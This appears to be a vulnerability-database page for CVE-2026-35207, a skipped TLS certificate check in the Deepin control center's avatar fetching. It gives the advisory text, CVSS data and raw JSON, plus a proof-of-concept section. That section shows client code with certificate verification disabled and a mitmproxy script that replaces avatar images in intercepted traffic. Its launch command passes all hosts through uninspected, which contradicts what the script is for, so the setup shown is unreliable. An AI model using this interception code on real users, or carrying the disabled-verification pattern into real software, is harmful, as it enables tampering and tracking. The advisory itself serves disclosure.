Security Vulnerability Report
CVE-2026-35207 CVSS 5.4 MEDIUM

CVE-2026-35207

Published: 2026-04-09 18:17:01
Last Modified: 2026-04-13 15:02:28

Description

dde-control-center is the control panel of DDE, the Deepin Desktop Environment. plugin-deepinid is a plugin in dde-control-center, which provides the deepinid cloud service. Prior to 6.1.80, plugin-deepinid is configured to skip TLS certificate verification when fetching the user's avatar from openapi.deepin.com or other providers. An MITM attacker could intercept the traffic, replace the avatar with a malicious or misleading image, and potentially identify the user by the avatar. This vulnerability is fixed in dde-control-center 6.1.80 and 5.9.9.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)


dde-control-center < 6.1.80
dde-control-center < 5.9.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC Concept: Demonstrating the vulnerability logic (Client Side)
# This script simulates how the vulnerable client requests the avatar.
import requests


# Vulnerable configuration: verify=False skips TLS certificate verification
def get_avatar_vulnerable(url):
    try:
        # The vulnerability lies here: SSL verification is disabled
        response = requests.get(url, verify=False, timeout=5)
        print(f"[*] Status: {response.status_code}")
        print(f"[*] Content Type: {response.headers.get('Content-Type')}")
        # In a real attack scenario, this content could be replaced by an attacker
        return response.content
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    target_url = "https://openapi.deepin.com/avatar/user_id"
    print(f"[*] Requesting avatar from {target_url} without certificate verification...")
    get_avatar_vulnerable(target_url)
```

PoC Concept: MITM Attack Setup (Attacker Side). Tools like mitmproxy can be used to intercept and modify traffic. Example command to run mitmproxy: `mitmproxy --ignore-hosts '.*' -s modify_avatar.py`. Content of `modify_avatar.py`:

```python
from mitmproxy import http


def request(flow: http.HTTPFlow) -> None:
    # Log the request
    print(f"[MITM] Intercepting request to: {flow.request.pretty_host}")


def response(flow: http.HTTPFlow) -> None:
    # Check if the request is for an avatar
    if "avatar" in flow.request.path:
        print("[MITM] Replacing avatar content with malicious image...")
        # Replace the response content with a local malicious image
        with open("malicious_avatar.png", "rb") as f:
            flow.response.content = f.read()
        flow.response.headers["Content-Length"] = str(len(flow.response.content))
```

References

Weakness: CWE-295 (Improper Certificate Validation)

https://github.com/linuxdeepin/dde-control-center/commit/6fc206120be28d9eef7d72258662bcabb834367f
https://github.com/linuxdeepin/dde-control-center/commit/cd95b054ff10a35bc9284431631305bd56244b3d
https://github.com/linuxdeepin/dde-control-center/pull/3146
https://github.com/linuxdeepin/developer-center/security/advisories/GHSA-jf2h-4vqc-3jgc

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-35207",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-09T18:17:01.110",
    "lastModified": "2026-04-13T15:02:27.760",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "dde-control-center is the control panel of DDE, the Deepin Desktop Environment. plugin-deepinid is a plugin in dde-control-center, which provides the deepinid cloud service. Prior to 6.1.80, plugin-deepinid is configured to skip TLS certificate verification when fetching the user's avatar from openapi.deepin.com or other providers. An MITM attacker could intercept the traffic, replace the avatar with a malicious or misleading image, and potentially identify the user by the avatar. This vulnerability is fixed in dde-control-center 6.1.80 and 5.9.9."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-295" }
        ]
      }
    ],
    "references": [
      { "url": "https://github.com/linuxdeepin/dde-control-center/commit/6fc206120be28d9eef7d72258662bcabb834367f", "source": "[email protected]" },
      { "url": "https://github.com/linuxdeepin/dde-control-center/commit/cd95b054ff10a35bc9284431631305bd56244b3d", "source": "[email protected]" },
      { "url": "https://github.com/linuxdeepin/dde-control-center/pull/3146", "source": "[email protected]" },
      { "url": "https://github.com/linuxdeepin/developer-center/security/advisories/GHSA-jf2h-4vqc-3jgc", "source": "[email protected]" }
    ]
  }
}
```